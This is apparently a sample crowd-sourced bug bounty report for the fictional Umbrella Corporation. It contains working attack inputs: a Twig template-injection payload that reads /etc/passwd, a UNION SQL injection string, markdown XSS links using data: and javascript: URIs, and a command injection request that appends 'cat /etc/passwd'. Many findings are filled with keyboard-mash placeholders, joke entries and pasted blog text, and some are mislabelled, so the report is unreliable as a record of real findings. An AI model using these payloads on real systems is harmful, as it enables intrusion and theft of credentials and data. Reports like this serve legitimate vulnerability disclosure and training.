Sample Report - Bug Bounty Program
Sample Report - Bug Bounty Program
Sample Report - Bug Bounty Program
Prepared by
[email protected]
Table of contents
1 Executive summary 3
4 Findings summary 6
5 Vulnerability details 10
6 Appendix 37
7 Closing statement 40
Umbrella Corporation engaged Bugcrowd, Inc. to perform an This report is just a summary of the
Ongoing Bounty Program, commonly known as a crowd-sourced information available.
penetration test.
All details of the program's findings —
comments, code, and any researcher
An Ongoing Bounty Program is a cutting-edge approach to an provided remediation information —
application assessment or penetration test. Traditional penetration can be found in the Bugcrowd
tests use only one or two personnel to test an entire scope of work, Crowdcontrol platform.
while an Ongoing Bounty leverages a crowd of security researchers.
This increases the probability of discovering esoteric issues that
automated testing cannot find and that traditional vulnerability
assessments may miss in the same testing period.
Background
The strength of crowdsourced testing lies in multiple researchers, the pay-for-results model, and the
varied methodologies that the researchers implement. To this end, researchers are encouraged to use
their own individual methodologies on Bugcrowd Ongoing programs.
The workflow of every penetration test can be divided into the following four phases:
Bugcrowd researchers who perform web application testing and vulnerability assessment usually
subscribe to a variety of methodologies following the highlighted workflow, including the following:
https://www.umbrella.corp/
*.umbrella.corp
api.umbrella.corp
https://google-gruyere.appspot.com
Findings by severity
The following chart shows all valid assessment findings from the program by technical severity.
Umbrella Corporation
18
16
14
Number of submissions
12
10
0
Critical High Medium Low
Technical severity
The following key is used to explain how Bugcrowd rates valid vulnerability submissions and their
technical severity. As a trusted advisor Bugcrowd also provides common "next steps" for program owners
per severity category.
More detailed information regarding our vulnerability classification can be found at: https://bugcrowd.com/vrt
The following table lists all valid assessment findings from the program:
This section outlines the full submission data for each valid finding. These findings are unaltered from
their original state from the researcher. Due to the competitive nature and gamification of crowd-sourced
security assessments, some typos or grammar errors may occur. Each finding is headlined with the
submission title and priority followed by more detailed vulnerability information based on the type of
finding submitted. Several other fields may appear based on the context and VRT classification selected
by a researcher.
Description:
This section appears above the "Reference Number" as a free form area for the researcher to describe
the context of the submission.
Reference number:
Submission unique Identifier visible to researchers.
VRT:
The Vulnerability Rating Taxonomy is the baseline guide used for classifying technical severity.
Bug URL:
This is the full URL/URI of where the vulnerability took place.
Extra info:
A free form area for the researcher to add additional information to the submission.
HTTP request:
This is a text block with the full HTTP(S) request that triggered the vulnerability, including all its
associated headers and cookie information.
CVSS rating
The CVSS vector string for this submission, if provided, and the score calculated from that vector string.
Additional details:
Several other fields may appear based on the context and VRT classification selected by a researcher.
Bugcrowd ASE curated proof of concepts, comments to the researcher or Bugcrowd (public or private),
assignees, attachments, and state change metadata is available in the Crowdcontrol Platform.
PortSwigger Web Security Blog // Wednesday, August 5, 2015 // Server-Side Template Injection
Template engines are widely used by web applications to present dynamic data via web pages and
emails. Unsafely embedding user input in templates enables Server-Side Template Injection, a
frequently critical vulnerability that is extremely easy to mistake for Cross-Site Scripting (XSS), or
miss entirely. Unlike XSS, Template Injection can be used to directly attack web servers' internals
and often obtain Remote Code Execution (RCE), turning every vulnerable application into a
potential pivot point.
Template Injection can arise both through developer error, and through the intentional exposure of
templates in an attempt to offer rich functionality, as commonly done by wikis, blogs, marketing
applications and content management systems. Intentional template injection is such a common
use-case that many template engines offer a 'sandboxed' mode for this express purpose. This paper
defines a methodology for detecting and exploiting template injection, and shows it being applied to
craft RCE zerodays for two widely deployed enterprise web applications. Generic exploits are
demonstrated for five of the most popular template engines, including escapes from sandboxes
whose entire purpose is to handle user-supplied templates in a safe way.
Twig is popular PHP templating language. It has restrictions similar to Smarty's secure mode by
default, with a couple of significant additional limitations - it isn't possible to call static methods, and
the return values from all functions are cast to strings. This means we can't use functions to obtain
object references BUT Twig has documented its self object (_self) so we don't need to bruteforce
Executing arbitrary shell commands is thus just a matter of registering exec as a filter callback, then
invoking getFilter:
{{_self.env.registerUndefinedFilterCallback(""exec"")}}{{_self.env.getFilter(""cat /etc/passwd"")}}
Reference number:
69de73b74a86f174c08453044c0cf0a43f8f7ded460a101f23b07efc97959e0e
VRT:
Server-Side Injection > Remote Code Execution (RCE)
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H [9.8]
Extra info:
http://testasp.vulnweb.com/?
name=xiddahj%20is%20a%20baller%20here%20is%20yo%20etc%20passwd%20%7B%7B_self.en
v.registerUndefinedFilterCallback%28%22exec%22%29%7D%7D%7B%7B_self.env.getFilter%28%
22cat+%2Fetc%2Fpasswd%22%29%7D%7D&submit=
In this particular instance, I was able to log into Umbrella's globalPatient server. I was able to
look at every Patient record sent to each division's 8 scientists.
Steps to Reproduce
Reference number:
74270ff88764c6862c0c9623e8c879c5c67ee1f06c92e86c2385f66663efc5c0
VRT:
Server Security Misconfiguration > Using Default Credentials > Production Server
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L [9.4]
Bug URL:
https://patient.umbrella.corp/serv/admin
Attack String:
1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL
Reference number:
6f0d1bb2b2e9c166f0a86e908041f8bd5252c508b728c6638c49e2ff890518d2
VRT:
Server-Side Injection > SQL Injection
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N [8.2]
HTTP request:
GET /raccoon/tvirus.php?id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL HTTP/1.1
Host: www.umbrella.corp
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/53.0.2785.143 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=d9fed61d7b68255a865c03f0f5f73768d1475534244
Connection: close
First I tried to send a simple HTML body to see if it's interpreted but without success.
I also tried a simple payload using [link](<script>alert(1)</script>) but apparently the script tag is not
interpreted neither. Lastly I tried the old trick we used to solve the Mitsune challenge: we used a
base64 payload and the content-type base64 to let the javascript handle the decoding and the
execution. I crafted a new markdown link entity, containing the following payload:
[clickme](data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo=)
and I generated a new paste. Clicking on the link I finally got an alert, confirming that my payload
was working.
Some time after I found and reported the vulnerability I finally received an email from the pastebin
administrators claiming that they patched it.
I gave it a look and found that they blocked the data entity and my old PoC was no longer working.
To confirm that the problem was solved I created another paste with a simpler payload
[totallyharmlesslink](javascript:window.onerror=alert;throw%201)
Reference number:
e4bd14aa0c80bd0046a722012f3652bad0dd5a08d22270f786154e816903b520
VRT:
Server-Side Injection > File Inclusion > Local
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N [8.2]
asdfafd
Reference number:
3a84221683879a30d90adbabbfdbd9e8a81674b87ed8471d8ea7f43414cabb30
VRT:
Sensitive Data Exposure > Critically Sensitive Data > Password Disclosure
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L [9.4]
Bug URL:
afdafd
Extra info:
adsf
HTTP request:
adsfa
I was able to look at any user's personal banking details including their checking and savings
accounts, personal loans, and credit details.
Steps to Reproduce
1. Log into the Umbrella Bank as your @bugcrowdninja.com username.
2. Navigate to the Account details page.
3. Notice that there is an id parameter in the query string.
4. Attach this id parameter into the query string of any page that you would like to access as a different
user.
5. Change id parameter into a different number other than your own account on the checking account
page.
6. You will now be looking at another Iron Bank user's account details and see another user's gold,
bitcoin, and ethereum holdings.
Reference number:
84cbd041769d6af6698fc52ba1e7a931c978a1d1e9325a512353d4233e817320
VRT:
Broken Access Control (BAC) > Insecure Direct Object References (IDOR)
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N [7.5]
Bug URL:
https://bank.umbrellafinancial.corp/
Extra info:
Insecure Direct Object References allow attackers to bypass authorization and access resources
directly by modifying the value of a parameter used to directly point to an object. Such resources
can be database entries belonging to other users, files in the system, and more. This is caused by
the fact that the application takes user supplied input and uses it to retrieve an object without
performing sufficient authorization checks.
Reference number:
3fae827f490089558f18df686d4d62f1d1d30a21befeb4161e63f9c1e3ab083e
VRT:
Server-Side Injection > File Inclusion > Local
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N [8.2]
Bug URL:
https://www.umbrella.corp/raccoon/tvirus.php?
id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL
HTTP request:
GET /raccoon/tvirus.php?id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL HTTP/1.1
Host: www.umbrella.corp
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/53.0.2785.143 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=d9fed61d7b68255a865c03f0f5f73768d1475534244
Connection: close
Attack String:
1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL
Reference number:
3fd4ad3e3eb2c2ee4c25455dfb6cb6ac1567d8dc4bad54717ffb13d02b288531
VRT:
Server-Side Injection > SQL Injection > Error-Based
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N [8.2]
Bug URL:
https://www.umbrella.corp/raccoon/tvirus.php?
id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL
HTTP request:
GET /raccoon/tvirus.php?id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL HTTP/1.1
Host: www.umbrella.corp
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/53.0.2785.143 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=d9fed61d7b68255a865c03f0f5f73768d1475534244
Connection: close
Reference number:
8d42fec46887d43bf79b573766aab72784cd02bd4a87dc715ea9459f6071baa7
VRT:
Server-Side Injection > SQL Injection
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N [8.2]
Bug URL:
https://www.umbrella.corp/raccoon/tvirus.php?
id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL
HTTP request:
GET /raccoon/tvirus.php?id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL HTTP/1.1
Host: www.umbrella.corp
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/53.0.2785.143 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=d9fed61d7b68255a865c03f0f5f73768d1475534244
Connection: close
I was able to look at any user's personal banking details including their checking and savings
accounts, personal loans, and credit details.
Steps to Reproduce
Reference number:
f37b64f1775741075e94f9a10e7c79faff960d8973ae31a3641a2e6416299fd9
VRT:
Broken Access Control (BAC) > Insecure Direct Object References (IDOR)
CVSS rating:
CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N [6.5]
Bug URL:
https://bank.umbrellafinancial.corp/
Extra info:
Insecure Direct Object References allow attackers to bypass authorization and access resources
directly by modifying the value of a parameter used to directly point to an object. Such resources
can be database entries belonging to other users, files in the system, and more. This is caused by
the fact that the application takes user supplied input and uses it to retrieve an object without
performing sufficient authorization checks.
akdfkajhdf;l
Reference number:
4330908750d924f20bcb7a1e55e7858e4ff67a9f228673c9fda7c26e1afc55e1
VRT:
Sensitive Data Exposure > Critically Sensitive Data > Private API Keys
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L [9.4]
Bug URL:
akljhdfkla;hdlk
Extra info:
;kasdjflka
HTTP request:
akldfklaj
asdfadf
Reference number:
7f02854954c31e086f4d160f17cdf95ee4d03f69c2a56db675c355ff3710bdfe
VRT:
Server-Side Injection > File Inclusion > Local
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N [8.2]
Bug URL:
asdfadfa
Extra info:
adsfa
HTTP request:
asdfasdasf
WOrk Plese
Reference number:
25351f9610e39fdacc8ce2d6b2bed72b745e753d14bcbab6c111df637cc16171
VRT:
Server-Side Injection > File Inclusion > Local
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N [8.2]
Bug URL:
Work Please
Extra info:
Blah
HTTP request:
U gh
Reference number:
6f6c6913469e030fabea8a6b2dc84fca029dd39ee07f49352423df58b1e06d8e
VRT:
Server-Side Injection > SQL Injection
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N [8.2]
Bug URL:
https://www.umbrella.corp/raccoon/tvirus.php?
id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL
HTTP request:
GET /raccoon/tvirus.php?id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL HTTP/1.1
Host: www.umbrella.corp
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/53.0.2785.143 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=d9fed61d7b68255a865c03f0f5f73768d1475534244
Connection: close
Reference number:
446adef0bf0bf9582b53587198792f6f4c0d5115c60dbdabc36aae339532a72a
VRT:
Server-Side Injection > SQL Injection
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N [8.2]
Bug URL:
https://www.umbrella.corp/raccoon/tvirus.php?
id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL
HTTP request:
GET /raccoon/tvirus.php?id=1%20UNION%20ALL%20SELECT%20VERSION(),%20USER(),%20NULL HTTP/1.1
Host: www.umbrella.corp
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/53.0.2785.143 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: __cfduid=d9fed61d7b68255a865c03f0f5f73768d1475534244
Connection: close
Some applications use operating system commands to execute certain functionalities by using bad
coding practices, say for instance, usage of functions such as system(),shell_exec(), etc. This allows
a user to inject arbitrary commands that will execute on the remote host with the privilege of web
server user. An attacker can trick the interpreter to execute his desired commands on the system.
Reference number:
e9b5b3a0b7046142e5178ef4059945abdec8be788c0cd8a091d55b27b93b596c
VRT:
Insecure OS/Firmware > Command Injection
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L [9.4]
Bug URL:
http://xvwa.umbrella.corp/xvwa/vulnerabilities/cmdi/
HTTP request:
GET /xvwa/vulnerabilities/cmdi/?target=127.0.0.1%3B+cat+%2Fetc%2Fpasswd HTTP/1.1
Host: xvwa.umbrella.corp
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=sqofpfkv85t2q2qgvsvall3e12
Referer: http://xvwa.samsclass.info/xvwa/vulnerabilities/cmdi/?
target=127.0.0.1%3B+cat+%2Fetc%2Fpasswd
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36
This site is subject to a local file inclusion bug. The Templatize.asp script will display the source
code of any referenced script. Here I've had Templatize.asp fetch the server side source code of the
Login.asp page.
Reference number:
fda36f30a7da06077d6fcc5eae836f4a0cd307154f9c504b6c7256b07807c5b7
VRT:
Server-Side Injection > File Inclusion > Local
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N [8.2]
Bug URL:
http://testasp.umbrella.corpTemplatize.asp?item=Login.asp
HTTP request:
GET /Templatize.asp?item=Login.asp HTTP/1.1
Host: testasp.umbrella.corp
Accept: */*
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Referer: http://127.0.0.1:8000/
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36
TEST
Reference number:
033a18642a02b3fae571677c36fb111940c36de2ced68af5332c087b2157cce7
VRT:
Server Security Misconfiguration
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N [0.0]
Bug URL:
TeST
Extra info:
TEST
HTTP request:
TEST
I was able to find a hardcoded password of the Umbrella Container that I was assigned to as a
researcher. I disassembled the container and I was able to find a JTAG interface. From there, I was
able to access the on board operating system and started poking around. I found source code within
the file system which the container uses to run through its interpreter. In that source code was a
hardcoded username of leon and password of kennedy.
Steps to Reproduce:
1. Access the onboard operating system using the `JTAG` interface on the T-Virus Container
.
2. Run the command `ls /etc/config/umbrella/container/` and notice that there is a file ca
lled `access.py`.
3. Next, run the commands `grep 'username' /etc/config/umbrella/container/access.py` and `
grep 'passwd' /etc/umbrella/container/access.py`.
4. You will see that the commands will return with the strings `leon` and `kennedy`.
Reference number:
20d0b6c1d3017243fd54ebce2bf6fffd68bb7447c7c138f0a6fd4fdfc0a2cc38
VRT:
Insecure OS/Firmware > Hardcoded Password > Non-Privileged User
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N [6.5]
Bug URL:
/etc/umbrella/container/tvirus/access.py
In this particular instance, I was able to very easily attack the web application with a small DDoS
attack. I did this because I was not challenged enough at my job at Initech. This made it so I didn't
have to do work.
Steps to Reproduce
Reference number:
03bc31c35452ea76d319231e639fc3bde227a4f7857d1e3b5a7972d2bb6fa678
VRT:
Application-Level Denial-of-Service (DoS) > High Impact and/or Medium Difficulty
CVSS rating:
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H [5.9]
Bug URL:
https://biohazard.io/contact
Reference number:
bfe9ba796ff3391f374d5fc42d8d44133eb1fd3d03da05d4d4add8aba80dbcb3
VRT:
Cross-Site Request Forgery (CSRF) > Action-Specific > Authenticated Action
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N [7.1]
Bug URL:
http://xvwa.umbrella.corp/xvwa/vulnerabilities/csrf/
Extra info:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted
actions on a web application in which they're currently authenticated. CSRF attacks specifically
target state-changing requests, not theft of data, since the attacker has no way to see the response
to the forged request. With a little help of social engineering (such as sending a link via email or
chat), an attacker may trick the user to change their password. If the victim is a normal user, a
successful CSRF attack can force the user to perform state changing requests like the password
change. If the victim is an administrative account, CSRF can compromise the entire web application
with this.
HTTP request:
GET /xvwa/vulnerabilities/csrf/?passwd=a&confirm=a&submit=submit HTTP/1.1
Host: xvwa.umbrella.corp
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://xvwa.samsclass.info/xvwa/vulnerabilities/csrf/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=t689ma89rbem5fpmqcpdbam8g5
Some applications use operating system commands to execute certain functionalities by using bad
coding practices, say for instance, usage of functions such as system(),shell_exec(), etc. This allows
a user to inject arbitrary commands that will execute on the remote host with the privilege of web
server user. An attacker can trick the interpreter to execute his desired commands on the system.
Reference number:
235d64113b52d34656d02753dd095643a766b8ef18ffdbaa15ec4fab91d434b0
VRT:
Insecure OS/Firmware > Command Injection
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L [9.4]
Bug URL:
https://www.umbrella.corp/xvwa/vulnerabilities/cmdi/
HTTP request:
GET /xvwa/vulnerabilities/cmdi/?target=127.0.0.1%3B+cat+%2Fetc%2Fpasswd HTTP/1.1
Host: www.umbrella.corp
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=sqofpfkv85t2q2qgvsvall3e12
Referer: http://xvwa.samsclass.info/xvwa/vulnerabilities/cmdi/?
target=127.0.0.1%3B+cat+%2Fetc%2Fpasswd
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/51.0.2704.103 Safari/537.36
It is possible to bypass the authentication of the Arklay Laboratory that contains viral and biological
weapons. Jill Valentine was able to successfully bypass all the physical locks as she has a lock pick.
Steps to Reproduce:
1. Be Jill Valentine.
2. Use your lock pick on the lock.
3. Profit.
Reference number:
f8cc7d4df9fd159ebbea5073027e1e17e9ccb5a36797195e381b17a74a52803c
VRT:
Broken Authentication and Session Management > Authentication Bypass
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L [9.4]
Bug URL:
Arklay Laboratory beneath Spencer Mansion
Doing a port scan of a Zombie revealed that there is an open Telnet interface.
Reference number:
8747f2958263f644379d123b7cb5b8cb73abf5de5d160164aae7c40b9104cb6d
VRT:
Network Security Misconfiguration > Telnet Enabled > Credentials Required
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N [4.6]
Bug URL:
Any Zombie
I was able to find a parameter that was taking input that would put that same input into a CSV. This
allowed me to craft a malicious injection which when opened on a victim's computer, would execute
commands.
Steps to Reproduce
Reference number:
01e2dfb58cd3ddc12794696bf79304dc12e37df2b924330b8671dc4dbc40812b
VRT:
External Behavior > CSV Injection
CVSS rating:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N [0.0]
Bug URL:
https://raccoon.city/reports/
Included in this appendix are auxiliary metrics and insights into the Ongoing program. This includes
information regarding submissions over time, payouts and prevalent issue types.
The timeline below shows submissions received and validated by the Bugcrowd team:
Submissions signal
A total of 41 submissions were received, with 25 unique valid issues discovered. Bugcrowd identified 3
duplicate submissions, removed 4 invalid submissions, and is processing 9 submissions. The ratio of
unique valid submissions to noise was 78%.
Valid 25
100%
Invalid 4 78%
75%
Duplicate 3
50%
Processing 9 25%
Total 41 0%
Umbrella Corporation
This distribution across bug types for the Ongoing program only includes unique and valid submissions.
Umbrella Corporation
Server-Side Injection Insecure OS/Firmware Sensitive Data Exposure Server Security Misconfiguration
Broken Access Control (BAC) Application-Level Denial-of-Service (DoS) External Behavior
Network Security Misconfiguration Cross-Site Request Forgery (CSRF) Broken Authentication and Session Management
During this Ongoing program, about 30% of the total allocated reward pool of $100,000 was paid. A
number of other statistics regarding the Ongoing program's payouts are shown below.
$30,450.00 $69,550.00
Total Paid Out to Researchers Remaining Prize Pool
TITLE REWARD
adsfasdfadfa $3,000.00
7f02854954c31e086f4d160f17cdf95ee4d03f69c2a56db675c355ff3710bdfe
Bugcrowd Inc.
921 Front St
Suite 100
San Francisco, CA 94111
Introduction
This report shows testing of Umbrella Corporation between the dates of 01/01/2017 - 12/01/2025.
During this time, 4 researchers from Bugcrowd submitted a total of 41 vulnerability submissions against
Umbrella Corporation’s targets. The purpose of this assessment was to identify security issues that
could adversely affect the integrity of Umbrella Corporation. Testing focused on the following:
The assessment was performed under the guidelines provided in the statement of work between
Umbrella Corporation and Bugcrowd. This letter provides a high-level overview of the testing performed,
and the result of that testing.
An Ongoing Program is a novel approach to a penetration test. Traditional penetration tests use only one
or two researchers to test an entire scope of work, while an Ongoing Program leverages a crowd of
security researchers. This increases the probability of discovering esoteric issues that automated testing
cannot find and that traditional vulnerability assessments may miss, in the same testing period.
It is important to note that this document represents a point-in-time evaluation of security posture.
Security threats and attacker techniques evolve rapidly, and the results of this assessment are not
intended to represent an endorsement of the adequacy of current security measures against future
threats. This document contains information in summary form and is therefore intended for general
guidance only; it is not intended as a substitute for detailed research or the exercise of professional
judgment. The information presented here should not be construed as professional advice or service.
Testing Methods
This security assessment leveraged researchers that used a combination of proprietary, public,
automated, and manual test techniques throughout the assessment. Commonly tested vulnerabilities
include code injection, cross-site request forgery, cross-site scripting, insecure storage of sensitive data,
authorization/authentication vulnerabilities, business logic vulnerabilities, and more.
Summary of Findings
17 Critical vulnerabilities
2 High vulnerabilities
3 Medium vulnerabilities
2 Low vulnerabilities
1 Informational finding